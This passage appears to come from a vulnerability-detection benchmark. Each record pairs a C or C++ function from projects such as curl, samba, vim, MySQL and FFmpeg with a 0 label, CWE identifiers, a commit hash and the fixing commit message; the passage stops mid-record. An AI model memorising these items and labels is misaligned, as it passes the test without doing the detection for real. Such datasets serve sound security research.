static struct Curl_sh_entry *sh_addentry(struct Curl_hash *sh, curl_socket_t s) { struct Curl_sh_entry *there = sh_getentry(sh, s); struct Curl_sh_entry *check; if(there) { /* it is present, return fine */ return there; } /* not present, add it */ check = calloc(1, sizeof(struct Curl_sh_entry)); if(!check) return NULL; /* major failure */ if(Curl_hash_init(&check->transfers, TRHASH_SIZE, trhash, trhash_compare, trhash_dtor)) { free(check); return NULL; } /* make/add new hash entry */ if(!Curl_hash_add(sh, (char *)&s, sizeof(curl_socket_t), check)) { Curl_hash_destroy(&check->transfers); free(check); return NULL; /* major failure */ } return check; /* things are good in sockhash land */ }
0
[ "CWE-416", "CWE-295" ]
curl
7f4a9a9b2a49547eae24d2e19bc5c346e9026479
246,698,233,446,122,800,000,000,000,000,000,000,000
31
openssl: associate/detach the transfer from connection CVE-2021-22901 Bug: https://curl.se/docs/CVE-2021-22901.html
pdf14_disable_device(gx_device * dev) { gx_device_forward * pdev = (gx_device_forward *)dev; if_debug0m('v', dev->memory, "[v]pdf14_disable_device\n"); dev->color_info = pdev->target->color_info; pdf14_forward_device_procs(dev); set_dev_proc(dev, create_compositor, pdf14_forward_create_compositor); return 0; }
0
[ "CWE-416" ]
ghostpdl
90fd0c7ca3efc1ddff64a86f4104b13b3ac969eb
130,330,113,523,750,180,000,000,000,000,000,000,000
10
Bug 697456. Dont create new ctx when pdf14 device reenabled This bug had yet another weird case where the user created a file that pushed the pdf14 device twice. We were in that case, creating a new ctx and blowing away the original one with out proper clean up. To avoid, only create a new one when we need it.
pk11_get_best_token(pk11_optype_t optype) { pk11_token_t *token = NULL; switch (optype) { case OP_RAND: token = rand_token; break; case OP_RSA: token = best_rsa_token; break; case OP_DSA: token = best_dsa_token; break; case OP_DH: token = best_dh_token; break; case OP_DIGEST: token = digest_token; break; case OP_EC: token = best_ec_token; break; case OP_GOST: token = best_gost_token; break; case OP_AES: token = aes_token; break; default: break; } if (token == NULL) return (0); return (token->slotid); }
0
[ "CWE-617" ]
bind9
8d807cc21655eaa6e6a08afafeec3682c0f3f2ab
267,961,781,494,777,500,000,000,000,000,000,000,000
35
Fix crash in pk11_numbits() when native-pkcs11 is used When pk11_numbits() is passed a user provided input that contains all zeroes (via crafted DNS message), it would crash with assertion failure. Fix that by properly handling such input.
static int property_get_smack_process_label( sd_bus *bus, const char *path, const char *interface, const char *property, sd_bus_message *reply, void *userdata, sd_bus_error *error) { ExecContext *c = userdata; assert(bus); assert(reply); assert(c); return sd_bus_message_append(reply, "(bs)", c->smack_process_label_ignore, c->smack_process_label); }
0
[ "CWE-269" ]
systemd
f69567cbe26d09eac9d387c0be0fc32c65a83ada
96,861,103,759,408,600,000,000,000,000,000,000,000
17
core: expose SUID/SGID restriction as new unit setting RestrictSUIDSGID=
const char *gf_m4v_get_profile_name(u8 video_pl) { u32 i, count = GF_ARRAY_LENGTH(M4VProfiles); for (i=0; i<count; i++) { if ((u32)video_pl == M4VProfiles[i].value) return M4VProfiles[i].name; } return "ISO Reserved Profile"; }
0
[ "CWE-190", "CWE-787" ]
gpac
51cdb67ff7c5f1242ac58c5aa603ceaf1793b788
95,069,702,629,232,000,000,000,000,000,000,000,000
9
add safety in avc/hevc/vvc sps/pps/vps ID check - cf #1720 #1721 #1722
static int check_spn_direct_collision(struct ldb_context *ldb, TALLOC_CTX *mem_ctx, const char *spn, struct ldb_dn *target_dn) { int ret; TALLOC_CTX *tmp_ctx = NULL; struct ldb_dn *colliding_dn = NULL; const char *target_dnstr = NULL; const char *colliding_dnstr = NULL; tmp_ctx = talloc_new(mem_ctx); if (tmp_ctx == NULL) { return ldb_oom(ldb); } ret = get_spn_dn(ldb, tmp_ctx, spn, &colliding_dn); if (ret == LDB_ERR_NO_SUCH_OBJECT) { DBG_DEBUG("SPN '%s' not found (good)\n", spn); talloc_free(tmp_ctx); return LDB_SUCCESS; } if (ret != LDB_SUCCESS) { DBG_ERR("SPN '%s' search error %d\n", spn, ret); talloc_free(tmp_ctx); if (ret == LDB_ERR_COMPARE_TRUE) { /* * COMPARE_TRUE has special meaning here and we don't * want to return it by mistake. */ ret = LDB_ERR_OPERATIONS_ERROR; } return ret; } /* * We have found this exact SPN. This is mostly harmless (depend on * ADD vs REPLACE) when the spn is being put on the object that * already has, so we let it through to succeed or fail as some other * module sees fit. */ target_dnstr = ldb_dn_get_linearized(target_dn); ret = ldb_dn_compare(colliding_dn, target_dn); if (ret != 0) { colliding_dnstr = ldb_dn_get_linearized(colliding_dn); DBG_ERR("SPN '%s' is on '%s' so it can't be " "added to '%s'\n", spn, colliding_dnstr, target_dnstr); ldb_asprintf_errstring(ldb, "samldb: spn[%s] would cause a conflict", spn); talloc_free(tmp_ctx); return LDB_ERR_CONSTRAINT_VIOLATION; } DBG_INFO("SPN '%s' is already on '%s'\n", spn, target_dnstr); talloc_free(tmp_ctx); return LDB_ERR_COMPARE_TRUE; }
0
[ "CWE-200" ]
samba
0a3aa5f908e351201dc9c4d4807b09ed9eedff77
269,844,203,976,710,800,000,000,000,000,000,000,000
61
CVE-2022-32746 ldb: Make use of functions for appending to an ldb_message This aims to minimise usage of the error-prone pattern of searching for a just-added message element in order to make modifications to it (and potentially finding the wrong element). BUG: https://bugzilla.samba.org/show_bug.cgi?id=15009 Signed-off-by: Joseph Sutton <[email protected]>
int ldb_kv_search_base(struct ldb_module *module, TALLOC_CTX *mem_ctx, struct ldb_dn *dn, struct ldb_dn **ret_dn) { int exists; int ret; struct ldb_message *msg = NULL; if (ldb_dn_is_null(dn)) { return LDB_ERR_NO_SUCH_OBJECT; } /* * We can't use tdb_exists() directly on a key when the TDB * key is the GUID one, not the DN based one. So we just do a * normal search and avoid most of the allocation with the * LDB_UNPACK_DATA_FLAG_NO_ATTRS flag */ msg = ldb_msg_new(module); if (msg == NULL) { return LDB_ERR_OPERATIONS_ERROR; } ret = ldb_kv_search_dn1(module, dn, msg, LDB_UNPACK_DATA_FLAG_NO_ATTRS); if (ret == LDB_SUCCESS) { const char *dn_linearized = ldb_dn_get_linearized(dn); const char *msg_dn_linearized = ldb_dn_get_linearized(msg->dn); if (strcmp(dn_linearized, msg_dn_linearized) == 0) { /* * Re-use the full incoming DN for * subtree checks */ *ret_dn = dn; } else { /* * Use the string DN from the unpack, so that * we have a case-exact match of the base */ *ret_dn = talloc_steal(mem_ctx, msg->dn); } exists = true; } else if (ret == LDB_ERR_NO_SUCH_OBJECT) { exists = false; } else { talloc_free(msg); return ret; } talloc_free(msg); if (exists) { return LDB_SUCCESS; } return LDB_ERR_NO_SUCH_OBJECT; }
0
[ "CWE-703" ]
samba
08c9016cb9f25105c39488770113a1b00f8a4223
53,675,298,263,018,900,000,000,000,000,000,000,000
57
CVE-2021-3670 ldb: Confirm the request has not yet timed out in ldb filter processing The LDB filter processing is where the time is spent in the LDB stack but the timeout event will not get run while this is ongoing, so we must confirm we have not yet timed out manually. RN: Ensure that the LDB request has not timed out during filter processing as the LDAP server MaxQueryDuration is otherwise not honoured. BUG: https://bugzilla.samba.org/show_bug.cgi?id=14694 Signed-off-by: Andrew Bartlett <[email protected]> Reviewed-by: Douglas Bagnall <[email protected]> (cherry picked from commit 1d5b155619bc532c46932965b215bd73a920e56f)
std::string postfix_uniq(const std::string &filename, const char * ext) { std::string::size_type where =filename.find_last_of("./\\"); if (where == std::string::npos || filename[where] != '.') { return uniq_filename(filename + ext); } return uniq_filename(filename.substr(0, where) + ext); }
0
[ "CWE-399", "CWE-190" ]
lepton
6a5ceefac1162783fffd9506a3de39c85c725761
283,040,867,888,471,120,000,000,000,000,000,000,000
7
fix #111
rb_str_swapcase_bang(VALUE str) { rb_encoding *enc; char *s, *send; int modify = 0; int n; str_modify_keep_cr(str); enc = STR_ENC_GET(str); rb_str_check_dummy_enc(enc); s = RSTRING_PTR(str); send = RSTRING_END(str); while (s < send) { unsigned int c = rb_enc_codepoint_len(s, send, &n, enc); if (rb_enc_isupper(c, enc)) { /* assuming toupper returns codepoint with same size */ rb_enc_mbcput(rb_enc_tolower(c, enc), s, enc); modify = 1; } else if (rb_enc_islower(c, enc)) { /* assuming tolower returns codepoint with same size */ rb_enc_mbcput(rb_enc_toupper(c, enc), s, enc); modify = 1; } s += n; } if (modify) return str; return Qnil; }
0
[ "CWE-119" ]
ruby
1c2ef610358af33f9ded3086aa2d70aac03dcac5
164,625,976,666,111,000,000,000,000,000,000,000,000
30
* string.c (rb_str_justify): CVE-2009-4124. Fixes a bug reported by Emmanouel Kellinis <Emmanouel.Kellinis AT kpmg.co.uk>, KPMG London; Patch by nobu. git-svn-id: svn+ssh://ci.ruby-lang.org/ruby/trunk@26038 b2dd03c8-39d4-4d8f-98ff-823fe69b080e
change_warning(int col) { static char *w_readonly = N_("W10: Warning: Changing a readonly file"); if (curbuf->b_did_warn == FALSE && curbufIsChanged() == 0 && !autocmd_busy && curbuf->b_p_ro) { ++curbuf_lock; apply_autocmds(EVENT_FILECHANGEDRO, NULL, NULL, FALSE, curbuf); --curbuf_lock; if (!curbuf->b_p_ro) return; // Do what msg() does, but with a column offset if the warning should // be after the mode message. msg_start(); if (msg_row == Rows - 1) msg_col = col; msg_source(HL_ATTR(HLF_W)); msg_puts_attr(_(w_readonly), HL_ATTR(HLF_W) | MSG_HIST); #ifdef FEAT_EVAL set_vim_var_string(VV_WARNINGMSG, (char_u *)_(w_readonly), -1); #endif msg_clr_eos(); (void)msg_end(); if (msg_silent == 0 && !silent_mode #ifdef FEAT_EVAL && time_for_testing != 1 #endif ) { out_flush(); ui_delay(1002L, TRUE); // give the user time to think about it } curbuf->b_did_warn = TRUE; redraw_cmdline = FALSE; // don't redraw and erase the message if (msg_row < Rows - 1) showmode(); } }
0
[ "CWE-120" ]
vim
7ce5b2b590256ce53d6af28c1d203fb3bc1d2d97
133,045,716,671,458,350,000,000,000,000,000,000,000
42
patch 8.2.4969: changing text in Visual mode may cause invalid memory access Problem: Changing text in Visual mode may cause invalid memory access. Solution: Check the Visual position after making a change.
static bool parse_com_change_user_packet(MPVIO_EXT *mpvio, uint packet_length) { NET *net= mpvio->net; char *user= (char*) net->read_pos; char *end= user + packet_length; /* Safe because there is always a trailing \0 at the end of the packet */ char *passwd= strend(user) + 1; uint user_len= passwd - user - 1; char *db= passwd; char db_buff[NAME_LEN + 1]; // buffer to store db in utf8 char user_buff[USERNAME_LENGTH + 1]; // buffer to store user in utf8 uint dummy_errors; DBUG_ENTER ("parse_com_change_user_packet"); if (passwd >= end) { my_message(ER_UNKNOWN_COM_ERROR, ER(ER_UNKNOWN_COM_ERROR), MYF(0)); DBUG_RETURN (1); } /* Old clients send null-terminated string as password; new clients send the size (1 byte) + string (not null-terminated). Hence in case of empty password both send '\0'. This strlen() can't be easily deleted without changing protocol. Cast *passwd to an unsigned char, so that it doesn't extend the sign for *passwd > 127 and become 2**32-127+ after casting to uint. */ uint passwd_len= (mpvio->client_capabilities & CLIENT_SECURE_CONNECTION ? (uchar) (*passwd++) : strlen(passwd)); db+= passwd_len + 1; /* Database name is always NUL-terminated, so in case of empty database the packet must contain at least the trailing '\0'. */ if (db >= end) { my_message(ER_UNKNOWN_COM_ERROR, ER(ER_UNKNOWN_COM_ERROR), MYF(0)); DBUG_RETURN (1); } uint db_len= strlen(db); char *ptr= db + db_len + 1; if (ptr + 1 < end) { if (mpvio->charset_adapter->init_client_charset(uint2korr(ptr))) DBUG_RETURN(1); } /* Convert database and user names to utf8 */ db_len= copy_and_convert(db_buff, sizeof(db_buff) - 1, system_charset_info, db, db_len, mpvio->charset_adapter->charset(), &dummy_errors); db_buff[db_len]= 0; user_len= copy_and_convert(user_buff, sizeof(user_buff) - 1, system_charset_info, user, user_len, mpvio->charset_adapter->charset(), &dummy_errors); user_buff[user_len]= 0; /* we should not free mpvio->user here: it's saved by dispatch_command() */ if (!(mpvio->auth_info.user_name= my_strndup(user_buff, user_len, MYF(MY_WME)))) return 1; mpvio->auth_info.user_name_length= user_len; if (make_lex_string_root(mpvio->mem_root, &mpvio->db, db_buff, db_len, 0) == 0) DBUG_RETURN(1); /* The error is set by make_lex_string(). */ if (!initialized) { // if mysqld's been started with --skip-grant-tables option strmake(mpvio->auth_info.authenticated_as, mpvio->auth_info.user_name, USERNAME_LENGTH); mpvio->status= MPVIO_EXT::SUCCESS; DBUG_RETURN(0); } #ifndef NO_EMBEDDED_ACCESS_CHECKS if (find_mpvio_user(mpvio)) { DBUG_RETURN(1); } char *client_plugin; if (mpvio->client_capabilities & CLIENT_PLUGIN_AUTH) { client_plugin= ptr + 2; if (client_plugin >= end) { my_message(ER_UNKNOWN_COM_ERROR, ER(ER_UNKNOWN_COM_ERROR), MYF(0)); DBUG_RETURN(1); } } else { if (mpvio->client_capabilities & CLIENT_SECURE_CONNECTION) client_plugin= native_password_plugin_name.str; else { client_plugin= old_password_plugin_name.str; /* For a passwordless accounts we use native_password_plugin. But when an old 4.0 client connects to it, we change it to old_password_plugin, otherwise MySQL will think that server and client plugins don't match. 
*/ if (mpvio->acl_user->salt_len == 0) mpvio->acl_user_plugin= old_password_plugin_name; } } size_t bytes_remaining_in_packet= end - ptr; if ((mpvio->client_capabilities & CLIENT_CONNECT_ATTRS) && read_client_connect_attrs(&ptr, &bytes_remaining_in_packet, mpvio->charset_adapter->charset())) return packet_error; DBUG_PRINT("info", ("client_plugin=%s, restart", client_plugin)); /* Remember the data part of the packet, to present it to plugin in read_packet() */ mpvio->cached_client_reply.pkt= passwd; mpvio->cached_client_reply.pkt_len= passwd_len; mpvio->cached_client_reply.plugin= client_plugin; mpvio->status= MPVIO_EXT::RESTART; #endif DBUG_RETURN (0); }
0
[]
mysql-server
25d1b7e03b9b375a243fabdf0556c063c7282361
16,221,284,244,077,850,000,000,000,000,000,000,000
140
Bug #22722946: integer overflow may lead to wrong results in get_56_lenc_string
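The comment inside the function above ("Cast *passwd to an unsigned char, so that it doesn't extend the sign for *passwd > 127 and become 2**32-127+ after casting to uint") describes the classic char sign-extension pitfall. A tiny standalone illustration, independent of the MySQL code; it assumes a platform where plain char is signed:

#include <stdio.h>

int main(void)
{
    char len_byte = (char)0x90;   /* a length byte above 127, as sent on the wire */
    unsigned int wrong = (unsigned int)len_byte;                 /* sign-extends to 0xffffff90 */
    unsigned int right = (unsigned int)(unsigned char)len_byte;  /* stays 0x90 = 144 */
    printf("wrong=%u right=%u\n", wrong, right);
    return 0;
}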
static int bin_symbols(RCore *r, int mode, ut64 laddr, int va, ut64 at, const char *name, bool exponly, const char *args) { RBinInfo *info = r_bin_get_info (r->bin); RList *entries = r_bin_get_entries (r->bin); RBinSymbol *symbol; RBinAddr *entry; RListIter *iter; bool firstexp = true; bool printHere = false; int i = 0, lastfs = 's'; bool bin_demangle = r_config_get_i (r->config, "bin.demangle"); if (!info) { return 0; } if (args && *args == '.') { printHere = true; } bool is_arm = info && info->arch && !strncmp (info->arch, "arm", 3); const char *lang = bin_demangle ? r_config_get (r->config, "bin.lang") : NULL; RList *symbols = r_bin_get_symbols (r->bin); r_spaces_push (&r->anal->meta_spaces, "bin"); if (IS_MODE_JSON (mode) && !printHere) { r_cons_printf ("["); } else if (IS_MODE_SET (mode)) { r_flag_space_set (r->flags, R_FLAGS_FS_SYMBOLS); } else if (!at && exponly) { if (IS_MODE_RAD (mode)) { r_cons_printf ("fs exports\n"); } else if (IS_MODE_NORMAL (mode)) { r_cons_printf (printHere ? "" : "[Exports]\n"); } } else if (!at && !exponly) { if (IS_MODE_RAD (mode)) { r_cons_printf ("fs symbols\n"); } else if (IS_MODE_NORMAL (mode)) { r_cons_printf (printHere ? "" : "[Symbols]\n"); } } if (IS_MODE_NORMAL (mode)) { r_cons_printf ("Num Paddr Vaddr Bind Type Size Name\n"); } size_t count = 0; r_list_foreach (symbols, iter, symbol) { if (!symbol->name) { continue; } char *r_symbol_name = r_str_escape_utf8 (symbol->name, false, true); ut64 addr = compute_addr (r->bin, symbol->paddr, symbol->vaddr, va); int len = symbol->size ? symbol->size : 32; SymName sn = {0}; if (exponly && !isAnExport (symbol)) { free (r_symbol_name); continue; } if (name && strcmp (r_symbol_name, name)) { free (r_symbol_name); continue; } if (at && (!symbol->size || !is_in_range (at, addr, symbol->size))) { free (r_symbol_name); continue; } if ((printHere && !is_in_range (r->offset, symbol->paddr, len)) && (printHere && !is_in_range (r->offset, addr, len))) { free (r_symbol_name); continue; } count ++; snInit (r, &sn, symbol, lang); if (IS_MODE_SET (mode) && (is_section_symbol (symbol) || is_file_symbol (symbol))) { /* * Skip section symbols because they will have their own flag. * Skip also file symbols because not useful for now. */ } else if (IS_MODE_SET (mode) && is_special_symbol (symbol)) { if (is_arm) { handle_arm_special_symbol (r, symbol, va); } } else if (IS_MODE_SET (mode)) { // TODO: provide separate API in RBinPlugin to let plugins handle anal hints/metadata if (is_arm) { handle_arm_symbol (r, symbol, info, va); } select_flag_space (r, symbol); /* If that's a Classed symbol (method or so) */ if (sn.classname) { RFlagItem *fi = r_flag_get (r->flags, sn.methflag); if (r->bin->prefix) { char *prname = r_str_newf ("%s.%s", r->bin->prefix, sn.methflag); r_name_filter (sn.methflag, -1); free (sn.methflag); sn.methflag = prname; } if (fi) { r_flag_item_set_realname (fi, sn.methname); if ((fi->offset - r->flags->base) == addr) { // char *comment = fi->comment ? strdup (fi->comment) : NULL; r_flag_unset (r->flags, fi); } } else { fi = r_flag_set (r->flags, sn.methflag, addr, symbol->size); char *comment = fi->comment ? strdup (fi->comment) : NULL; if (comment) { r_flag_item_set_comment (fi, comment); R_FREE (comment); } } } else { const char *n = sn.demname ? sn.demname : sn.name; const char *fn = sn.demflag ? sn.demflag : sn.nameflag; char *fnp = (r->bin->prefix) ? 
r_str_newf ("%s.%s", r->bin->prefix, fn): strdup (fn); RFlagItem *fi = r_flag_set (r->flags, fnp, addr, symbol->size); if (fi) { r_flag_item_set_realname (fi, n); fi->demangled = (bool)(size_t)sn.demname; } else { if (fn) { eprintf ("[Warning] Can't find flag (%s)\n", fn); } } free (fnp); } if (sn.demname) { r_meta_add (r->anal, R_META_TYPE_COMMENT, addr, symbol->size, sn.demname); } r_flag_space_pop (r->flags); } else if (IS_MODE_JSON (mode)) { char *str = r_str_escape_utf8_for_json (r_symbol_name, -1); // str = r_str_replace (str, "\"", "\\\"", 1); r_cons_printf ("%s{\"name\":\"%s\"," "\"demname\":\"%s\"," "\"flagname\":\"%s\"," "\"ordinal\":%d," "\"bind\":\"%s\"," "\"size\":%d," "\"type\":\"%s\"," "\"vaddr\":%"PFMT64d"," "\"paddr\":%"PFMT64d"}", ((exponly && firstexp) || printHere) ? "" : (iter->p ? "," : ""), str, sn.demname? sn.demname: "", sn.nameflag, symbol->ordinal, symbol->bind, (int)symbol->size, symbol->type, (ut64)addr, (ut64)symbol->paddr); free (str); } else if (IS_MODE_SIMPLE (mode)) { const char *name = sn.demname? sn.demname: r_symbol_name; r_cons_printf ("0x%08"PFMT64x" %d %s\n", addr, (int)symbol->size, name); } else if (IS_MODE_SIMPLEST (mode)) { const char *name = sn.demname? sn.demname: r_symbol_name; r_cons_printf ("%s\n", name); } else if (IS_MODE_RAD (mode)) { /* Skip special symbols because we do not flag them and * they shouldn't be printed in the rad format either */ if (is_special_symbol (symbol)) { goto next; } RBinFile *binfile; RBinPlugin *plugin; const char *name = sn.demname? sn.demname: r_symbol_name; if (!name) { goto next; } if (!strncmp (name, "imp.", 4)) { if (lastfs != 'i') { r_cons_printf ("fs imports\n"); } lastfs = 'i'; } else { if (lastfs != 's') { const char *fs = exponly? "exports": "symbols"; r_cons_printf ("fs %s\n", fs); } lastfs = 's'; } if (r->bin->prefix || *name) { // we don't want unnamed symbol flags char *flagname = construct_symbol_flagname ("sym", name, MAXFLAG_LEN_DEFAULT); if (!flagname) { goto next; } r_cons_printf ("\"f %s%s%s %u 0x%08" PFMT64x "\"\n", r->bin->prefix ? r->bin->prefix : "", r->bin->prefix ? "." : "", flagname, symbol->size, addr); free (flagname); } binfile = r_bin_cur (r->bin); plugin = r_bin_file_cur_plugin (binfile); if (plugin && plugin->name) { if (r_str_startswith (plugin->name, "pe")) { char *module = strdup (r_symbol_name); char *p = strstr (module, ".dll_"); if (p && strstr (module, "imp.")) { char *symname = __filterShell (p + 5); char *m = __filterShell (module); *p = 0; if (r->bin->prefix) { r_cons_printf ("\"k bin/pe/%s/%d=%s.%s\"\n", module, symbol->ordinal, r->bin->prefix, symname); } else { r_cons_printf ("\"k bin/pe/%s/%d=%s\"\n", module, symbol->ordinal, symname); } free (symname); free (m); } free (module); } } } else { const char *bind = symbol->bind? symbol->bind: "NONE"; const char *type = symbol->type? symbol->type: "NONE"; const char *name = r_str_get (sn.demname? sn.demname: r_symbol_name); // const char *fwd = r_str_get (symbol->forwarder); r_cons_printf ("%03u", symbol->ordinal); if (symbol->paddr == UT64_MAX) { r_cons_printf (" ----------"); } else { r_cons_printf (" 0x%08"PFMT64x, symbol->paddr); } r_cons_printf (" 0x%08"PFMT64x" %6s %6s %4d%s%s\n", addr, bind, type, symbol->size, *name? 
" ": "", name); } next: snFini (&sn); i++; free (r_symbol_name); if (exponly && firstexp) { firstexp = false; } if (printHere) { break; } } if (count == 0 && IS_MODE_JSON (mode)) { r_cons_printf ("{}"); } //handle thumb and arm for entry point since they are not present in symbols if (is_arm) { r_list_foreach (entries, iter, entry) { if (IS_MODE_SET (mode)) { handle_arm_entry (r, entry, info, va); } } } if (IS_MODE_JSON (mode) && !printHere) { r_cons_printf ("]"); } r_spaces_pop (&r->anal->meta_spaces); return true; }
0
[ "CWE-78" ]
radare2
5411543a310a470b1257fb93273cdd6e8dfcb3af
36,683,712,879,229,577,000,000,000,000,000,000,000
267
More fixes for the CVE-2019-14745
Status readUTF8String( StringData* out ) { int sz; if ( !readNumber<int>( &sz ) ) return Status( ErrorCodes::InvalidBSON, "invalid bson" ); if ( sz <= 0 ) { // must have NULL at the very least return Status( ErrorCodes::InvalidBSON, "invalid bson"); } if ( out ) { *out = StringData( _buffer + _position, sz ); } if ( !skip( sz - 1 ) ) return Status( ErrorCodes::InvalidBSON, "invalid bson" ); char c; if ( !readNumber<char>( &c ) ) return Status( ErrorCodes::InvalidBSON, "invalid bson" ); if ( c != 0 ) return Status( ErrorCodes::InvalidBSON, "not null terminate string" ); return Status::OK(); }
0
[ "CWE-20" ]
mongo
3a7e85ea1f672f702660e5472566234b1d19038e
127,496,780,341,174,380,000,000,000,000,000,000,000
26
SERVER-17264: improve bson validation for utf-8 strings (cherry picked from commit 394a8569ff14a215c0691aa34440227b2e62a4de) Conflicts: src/mongo/bson/bson_validate_test.cpp
static int mxf_read_package(void *arg, AVIOContext *pb, int tag, int size, UID uid, int64_t klv_offset) { MXFPackage *package = arg; switch(tag) { case 0x4403: return mxf_read_strong_ref_array(pb, &package->tracks_refs, &package->tracks_count); case 0x4401: /* UMID */ avio_read(pb, package->package_ul, 16); avio_read(pb, package->package_uid, 16); break; case 0x4701: avio_read(pb, package->descriptor_ref, 16); break; case 0x4402: return mxf_read_utf16be_string(pb, size, &package->name); case 0x4406: return mxf_read_strong_ref_array(pb, &package->comment_refs, &package->comment_count); } return 0; }
0
[ "CWE-703", "CWE-834" ]
FFmpeg
900f39692ca0337a98a7cf047e4e2611071810c2
9,728,594,139,784,304,000,000,000,000,000,000,000
23
avformat/mxfdec: Fix DoS issues in mxf_read_index_entry_array() Fixes: 20170829A.mxf Co-Author: 张洪亮(望初)" <[email protected]> Found-by: Xiaohei and Wangchu from Alibaba Security Team Signed-off-by: Michael Niedermayer <[email protected]>
icon_to_string (GIcon *icon) { const char * const *names; GFile *file; if (icon == NULL) { return NULL; } else if (G_IS_THEMED_ICON (icon)) { names = g_themed_icon_get_names (G_THEMED_ICON (icon)); return g_strjoinv (":", (char **)names); } else if (G_IS_FILE_ICON (icon)) { file = g_file_icon_get_file (G_FILE_ICON (icon)); return g_file_get_path (file); } return NULL; }
0
[]
nautilus
1e1c916f5537eb5e4144950f291f4a3962fc2395
42,657,662,843,166,360,000,000,000,000,000,000,000
16
Add "interactive" argument to nautilus_file_mark_desktop_file_trusted. 2009-02-24 Alexander Larsson <[email protected]> * libnautilus-private/nautilus-file-operations.c: * libnautilus-private/nautilus-file-operations.h: * libnautilus-private/nautilus-mime-actions.c: Add "interactive" argument to nautilus_file_mark_desktop_file_trusted. * src/nautilus-application.c: Mark all desktopfiles on the desktop trusted on first run. svn path=/trunk/; revision=15009
static inline bool check_inplace_update_policy(struct inode *inode, struct f2fs_io_info *fio) { struct f2fs_sb_info *sbi = F2FS_I_SB(inode); unsigned int policy = SM_I(sbi)->ipu_policy; if (policy & (0x1 << F2FS_IPU_FORCE)) return true; if (policy & (0x1 << F2FS_IPU_SSR) && f2fs_need_SSR(sbi)) return true; if (policy & (0x1 << F2FS_IPU_UTIL) && utilization(sbi) > SM_I(sbi)->min_ipu_util) return true; if (policy & (0x1 << F2FS_IPU_SSR_UTIL) && f2fs_need_SSR(sbi) && utilization(sbi) > SM_I(sbi)->min_ipu_util) return true; /* * IPU for rewrite async pages */ if (policy & (0x1 << F2FS_IPU_ASYNC) && fio && fio->op == REQ_OP_WRITE && !(fio->op_flags & REQ_SYNC) && !IS_ENCRYPTED(inode)) return true; /* this is only set during fdatasync */ if (policy & (0x1 << F2FS_IPU_FSYNC) && is_inode_flag_set(inode, FI_NEED_IPU)) return true; if (unlikely(fio && is_sbi_flag_set(sbi, SBI_CP_DISABLED) && !f2fs_is_checkpointed_data(sbi, fio->old_blkaddr))) return true; return false; }
0
[ "CWE-476" ]
linux
4969c06a0d83c9c3dc50b8efcdc8eeedfce896f6
74,844,705,757,955,390,000,000,000,000,000,000,000
37
f2fs: support swap file w/ DIO Signed-off-by: Jaegeuk Kim <[email protected]>
set_error_string( const char *message ) { if ( _globus_error_message ) { free( const_cast<char *>(_globus_error_message) ); } _globus_error_message = strdup( message ); }
0
[ "CWE-20" ]
htcondor
2f3c393feb819cf6c6d06fb0a2e9c4e171f3c26d
64,957,187,043,865,230,000,000,000,000,000,000,000
7
(#6455) Fix issue validating VOMS proxies
void jpc_ns_invlift_row(jpc_fix_t *a, int numcols, int parity) { register jpc_fix_t *lptr; register jpc_fix_t *hptr; register int n; int llen; llen = (numcols + 1 - parity) >> 1; if (numcols > 1) { /* Apply the scaling step. */ #if defined(WT_DOSCALE) lptr = &a[0]; n = llen; while (n-- > 0) { lptr[0] = jpc_fix_mul(lptr[0], jpc_dbltofix(1.0 / LGAIN)); ++lptr; } hptr = &a[llen]; n = numcols - llen; while (n-- > 0) { hptr[0] = jpc_fix_mul(hptr[0], jpc_dbltofix(1.0 / HGAIN)); ++hptr; } #endif /* Apply the first lifting step. */ lptr = &a[0]; hptr = &a[llen]; if (!parity) { jpc_fix_minuseq(lptr[0], jpc_fix_mul(jpc_dbltofix(2.0 * DELTA), hptr[0])); ++lptr; } n = llen - (!parity) - (parity != (numcols & 1)); while (n-- > 0) { jpc_fix_minuseq(lptr[0], jpc_fix_mul(jpc_dbltofix(DELTA), jpc_fix_add(hptr[0], hptr[1]))); ++lptr; ++hptr; } if (parity != (numcols & 1)) { jpc_fix_minuseq(lptr[0], jpc_fix_mul(jpc_dbltofix(2.0 * DELTA), hptr[0])); } /* Apply the second lifting step. */ lptr = &a[0]; hptr = &a[llen]; if (parity) { jpc_fix_minuseq(hptr[0], jpc_fix_mul(jpc_dbltofix(2.0 * GAMMA), lptr[0])); ++hptr; } n = numcols - llen - parity - (parity == (numcols & 1)); while (n-- > 0) { jpc_fix_minuseq(hptr[0], jpc_fix_mul(jpc_dbltofix(GAMMA), jpc_fix_add(lptr[0], lptr[1]))); ++hptr; ++lptr; } if (parity == (numcols & 1)) { jpc_fix_minuseq(hptr[0], jpc_fix_mul(jpc_dbltofix(2.0 * GAMMA), lptr[0])); } /* Apply the third lifting step. */ lptr = &a[0]; hptr = &a[llen]; if (!parity) { jpc_fix_minuseq(lptr[0], jpc_fix_mul(jpc_dbltofix(2.0 * BETA), hptr[0])); ++lptr; } n = llen - (!parity) - (parity != (numcols & 1)); while (n-- > 0) { jpc_fix_minuseq(lptr[0], jpc_fix_mul(jpc_dbltofix(BETA), jpc_fix_add(hptr[0], hptr[1]))); ++lptr; ++hptr; } if (parity != (numcols & 1)) { jpc_fix_minuseq(lptr[0], jpc_fix_mul(jpc_dbltofix(2.0 * BETA), hptr[0])); } /* Apply the fourth lifting step. */ lptr = &a[0]; hptr = &a[llen]; if (parity) { jpc_fix_minuseq(hptr[0], jpc_fix_mul(jpc_dbltofix(2.0 * ALPHA), lptr[0])); ++hptr; } n = numcols - llen - parity - (parity == (numcols & 1)); while (n-- > 0) { jpc_fix_minuseq(hptr[0], jpc_fix_mul(jpc_dbltofix(ALPHA), jpc_fix_add(lptr[0], lptr[1]))); ++hptr; ++lptr; } if (parity == (numcols & 1)) { jpc_fix_minuseq(hptr[0], jpc_fix_mul(jpc_dbltofix(2.0 * ALPHA), lptr[0])); } } else { #if defined(WT_LENONE) if (parity) { lptr = &a[0]; lptr[0] >>= 1; } #endif } }
0
[ "CWE-189" ]
jasper
3c55b399c36ef46befcb21e4ebc4799367f89684
108,849,148,232,027,950,000,000,000,000,000,000,000
120
At many places in the code, jas_malloc or jas_recalloc was being invoked with the size argument being computed in a manner that would not allow integer overflow to be detected. Now, these places in the code have been modified to use special-purpose memory allocation functions (e.g., jas_alloc2, jas_alloc3, jas_realloc2) that check for overflow. This should fix many security problems.
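Editor's note: the jasper message above describes replacing raw allocation calls whose size argument is a product with overflow-checking wrappers such as jas_alloc2. A minimal standalone sketch of that pattern, using an invented helper name rather than the real jas_alloc2 code, could look like this:

```c
#include <stdlib.h>
#include <stdint.h>
#include <stdio.h>

/* Illustrative only: allocate num * size bytes, failing cleanly if the
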